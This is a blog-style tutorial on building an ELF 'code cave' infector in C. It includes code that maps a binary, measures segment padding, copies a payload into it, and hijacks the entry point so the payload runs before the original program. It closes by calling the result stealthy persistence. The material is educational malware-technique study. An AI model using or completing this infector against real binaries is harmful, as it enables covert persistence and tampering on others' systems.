Deep Dive: Writing an ELF Code Cave Infector in C

Disclaimer: This tool is a Proof of Concept (PoC) for educational purposes only.

Understanding how Linux executables work under the hood is one of the best ways to understand system security. In this project, I built a “Code Cave Injector”: a tool that hides a payload inside an existing binary without changing its file size.

Here is a breakdown of how my Infektor tool works, referencing the source code.

The Concept: What is a “Code Cave”?

When a toolchain (like GCC and its linker) builds a program, it organizes the code and data into Segments. Because the kernel maps memory and applies permissions one page at a time, loadable segments are aligned to Page Boundaries (usually 4096 bytes / 0x1000).

Because code rarely fits exactly into these 4096-byte blocks, there is often empty space (padding) filled with zeros at the end of the executable segment. This gap is called a Code Cave.

Visualizing the gaps between segments in an ELF file.

My tool finds this gap and inserts shellcode into it.
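To make the arithmetic concrete, here is a minimal sketch of how much padding sits between the end of a segment and the next page boundary. The helper name padding_to_next_page is my own for illustration and is not part of Infektor; the tool itself measures the gap from the program headers, as described later.

```c
#include <stdint.h>

/* Bytes of padding between end_offset and the next page boundary.
 * page_size must be a power of two (0x1000 on typical x86-64 Linux).
 * Hypothetical helper for illustration only. */
static uint64_t padding_to_next_page(uint64_t end_offset, uint64_t page_size)
{
    /* Round end_offset up to the next multiple of page_size. */
    uint64_t next_boundary = (end_offset + page_size - 1) & ~(page_size - 1);
    return next_boundary - end_offset;
}
```

For example, a segment whose contents end at file offset 0x1a3d leaves 0x2000 - 0x1a3d = 0x5c3 (1475) bytes before the next 4096-byte boundary. A segment that ends exactly on a boundary leaves no padding at all.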

Key Implementation Details

The injector performs three main tasks:

1. Map the target binary into memory.
2. Find a suitable gap (Code Cave) in the executable segment.
3. Inject the payload and hijack the Entry Point.
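As a rough sketch of the second task, the function below walks the program header table of a mapped ELF64 image and returns the first PT_LOAD segment that carries the executable flag. The name find_exec_segment and the validation checks are my assumptions for illustration; the actual tool may locate the segment differently.

```c
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Returns the first executable PT_LOAD header in a mapped ELF64 image,
 * or NULL if the image is not ELF64 or has no such segment.
 * Hypothetical helper; `file` is assumed to be suitably aligned
 * (an mmap'd file always is). */
static Elf64_Phdr *find_exec_segment(unsigned char *file, size_t size)
{
    if (size < sizeof(Elf64_Ehdr) || memcmp(file, ELFMAG, SELFMAG) != 0)
        return NULL;
    if (file[EI_CLASS] != ELFCLASS64)
        return NULL;

    Elf64_Ehdr *ehdr = (Elf64_Ehdr *)file;

    /* Reject a program header table that runs past the end of the file. */
    if (ehdr->e_phoff > size ||
        (size - ehdr->e_phoff) / sizeof(Elf64_Phdr) < ehdr->e_phnum)
        return NULL;

    Elf64_Phdr *phdr = (Elf64_Phdr *)(file + ehdr->e_phoff);
    for (int i = 0; i < ehdr->e_phnum; i++) {
        if (phdr[i].p_type == PT_LOAD && (phdr[i].p_flags & PF_X))
            return &phdr[i];
    }
    return NULL;
}
```

Checking the magic bytes and the table bounds first keeps the injector from dereferencing garbage when it is pointed at something that is not a 64-bit ELF file.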

1. Memory Mapping (mmap)

Instead of using standard read/write calls, I used mmap. This maps the file directly into the program’s virtual address space. Because of the MAP_SHARED flag, any change I make to the file[] array is carried through to the file on disk; the kernel writes the modified pages back on its own schedule, or when msync is called.
```
unsigned char *file = mmap(
    NULL,
    size,
    PROT_READ | PROT_WRITE,
    MAP_SHARED, // Writes sync back to the file
    fd,
    0
);
```
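The call above needs a file descriptor and a size, and mmap reports failure with MAP_FAILED rather than NULL. A minimal sketch of the surrounding steps might look like this; map_file_rw and unmap_file are hypothetical names I chose for illustration, not functions from the tool.

```c
#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Maps `path` read/write and shared. Returns NULL on any failure.
 * Hypothetical helper for illustration. */
static unsigned char *map_file_rw(const char *path, size_t *size_out)
{
    int fd = open(path, O_RDWR);
    if (fd < 0)
        return NULL;

    struct stat st;
    if (fstat(fd, &st) < 0 || st.st_size <= 0) {
        close(fd);
        return NULL;
    }

    void *p = mmap(NULL, (size_t)st.st_size, PROT_READ | PROT_WRITE,
                   MAP_SHARED, fd, 0);
    close(fd); /* the mapping stays valid after the descriptor is closed */
    if (p == MAP_FAILED)
        return NULL;

    *size_out = (size_t)st.st_size;
    return (unsigned char *)p;
}

/* Flushes modified pages to the file, then removes the mapping. */
static int unmap_file(unsigned char *file, size_t size)
{
    if (msync(file, size, MS_SYNC) < 0)
        return -1;
    return munmap(file, size);
}
```

Calling msync with MS_SYNC before munmap is a conservative choice: it blocks until the changes have been written, so a later read of the file is guaranteed to see the patched bytes.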

2. The Safety Check (`calculate_gap`)

This is the most critical part of the code. If we blindly inject code, we might overwrite the start of the next segment (the one holding sections like .rodata or .data), crashing the program.

I implemented a function calculate_gap that scans the program headers to measure exactly how much file space exists between the end of the target PT_LOAD segment and the start of whatever comes next.

```
size_t calculate_gap(Elf64_Phdr *target, Elf64_Phdr *all_hdrs, int count, size_t file_size)
{
    Elf64_Off target_end = target->p_offset + target->p_filesz;
    Elf64_Off nearest_next_start = file_size;

    // Scan all headers to find the one that starts immediately after our target
    for (int i = 0; i < count; i++) {
        Elf64_Off current_start = all_hdrs[i].p_offset;
        if (current_start >= target_end) {
            if (current_start < nearest_next_start) {
                nearest_next_start = current_start;
            }
        }
    }
    return nearest_next_start - target_end;
}
```

If size_payload > available_gap, the tool aborts with a CRITICAL ERROR, so it never writes past the padding into the next segment.
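Here is a small worked example of the check, using two made-up program headers. calculate_gap is repeated from above so the sketch compiles on its own; payload_fits is a hypothetical wrapper I added for illustration, and the offsets are invented rather than taken from a real binary.

```c
#include <elf.h>
#include <stddef.h>

/* calculate_gap as shown above, repeated so this sketch is self-contained. */
static size_t calculate_gap(Elf64_Phdr *target, Elf64_Phdr *all_hdrs,
                            int count, size_t file_size)
{
    Elf64_Off target_end = target->p_offset + target->p_filesz;
    Elf64_Off nearest_next_start = file_size;

    for (int i = 0; i < count; i++) {
        Elf64_Off current_start = all_hdrs[i].p_offset;
        if (current_start >= target_end && current_start < nearest_next_start)
            nearest_next_start = current_start;
    }
    return nearest_next_start - target_end;
}

/* Hypothetical helper: nonzero if the payload fits inside the cave. */
static int payload_fits(size_t size_payload, size_t available_gap)
{
    return size_payload <= available_gap;
}
```

With a text segment at offset 0x1000 of size 0x3d5 and the next segment starting at 0x2000, the gap is 0x2000 - 0x13d5 = 0xc2b (3115) bytes. A 256-byte payload passes the check, while anything larger than 0xc2b bytes is rejected.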

3. Hijacking Execution (infection)

Once the space is confirmed, the injection happens.

Copy Payload: I copy the shellcode into the cave at the end of the text segment.
Patch Jump Target: My payload needs to jump back to the original entry point so the user doesn’t notice anything. I calculate jt_offset, the offset of the jump_target variable inside the shellcode, and write the original e_entry value there.
Update Entry Point: Finally, I modify the ELF Header (e_entry) to point to my new code location (payload_va).

```
int infection(int fd, Elf64_Ehdr *ehdr, Elf64_Phdr *phdr, unsigned char *file)
{
    // ... logic to calculate offsets ...

    // Patch the payload with the original entry point
    memcpy(payload_dst + jt_offset, &original_entry, sizeof(Elf64_Addr));

    // Hijack the binary entry point
    ehdr->e_entry = payload_va;

    // Officially extend the segment size to include the payload
    phdr->p_filesz += size;
    phdr->p_memsz += size;

    return 0;
}
```
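The offset calculation is elided in the excerpt above, so the following is only my guess at one plausible way to derive the two locations involved, not the tool's actual code. It assumes the cave starts immediately after the file contents of the text segment; struct cave_location and locate_cave are hypothetical names.

```c
#include <elf.h>

/* Where the payload would live, both in the file and in memory.
 * Hypothetical type for illustration. */
struct cave_location {
    Elf64_Off  file_offset; /* where to copy the bytes in the mapped file */
    Elf64_Addr vaddr;       /* where those bytes appear once loaded       */
};

/* Assumes the cave begins right after the segment's file contents. */
static struct cave_location locate_cave(const Elf64_Phdr *text)
{
    struct cave_location loc;
    loc.file_offset = text->p_offset + text->p_filesz;
    loc.vaddr       = text->p_vaddr  + text->p_filesz;
    return loc;
}
```

The same p_filesz is added to both fields because a PT_LOAD segment is mapped linearly: byte N of the segment in the file lands at p_vaddr + N in memory. Note that in a position-independent executable these addresses are relative to a load base chosen at run time, so a payload that jumps to an absolute address only works as-is for non-PIE binaries.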

Linking C and Assembly

One interesting challenge was linking the C injector with the Assembly payload. I used extern symbols to access labels defined in the .s file directly from C.

```
extern unsigned char payload_start;
extern unsigned long jump_target;
```

This allows the C code to measure the payload size dynamically and know exactly where to patch the jump addresses.
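To show the patching step without an assembly file, the sketch below uses a byte array as a stand-in for the assembled payload. Everything in it is an assumption for illustration: demo_payload, DEMO_JT_OFFSET and copy_and_patch are made-up names, and the bytes are not the tool's real shellcode. With the real symbols, the offset would come from pointer arithmetic such as (unsigned char *)&jump_target - &payload_start, and measuring the size would need a second label at the end of the payload, which the excerpt does not show.

```c
#include <stdint.h>
#include <string.h>

/* Stand-in for the assembled payload (hypothetical bytes). */
static const unsigned char demo_payload[] = {
    0x90, 0x90,                         /* nop; nop (placeholder work)      */
    0xff, 0x25, 0x00, 0x00, 0x00, 0x00, /* jmp *0(%rip): jump through the
                                           8-byte slot that follows         */
    0, 0, 0, 0, 0, 0, 0, 0              /* jump_target slot, patched below  */
};

/* Offset of the jump_target slot inside demo_payload. */
enum { DEMO_JT_OFFSET = 8 };

/* Copies the payload into the cave and writes the original entry point
 * into the jump_target slot. dst must have room for the whole payload. */
static void copy_and_patch(unsigned char *dst, uint64_t original_entry)
{
    memcpy(dst, demo_payload, sizeof demo_payload);
    memcpy(dst + DEMO_JT_OFFSET, &original_entry, sizeof original_entry);
}
```

Using memcpy for the 8-byte write avoids an unaligned store through a cast pointer, since nothing guarantees that the slot is 8-byte aligned inside the cave.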

Conclusion

This project was a deep dive into the ELF file format. By manipulating Elf64_Phdr structures directly, I learned how the OS loader parses binaries. The result is a stealthy persistence mechanism that leaves the file size on disk unchanged (ls -l shows no difference!), although the file's contents, and therefore its hash, do change.
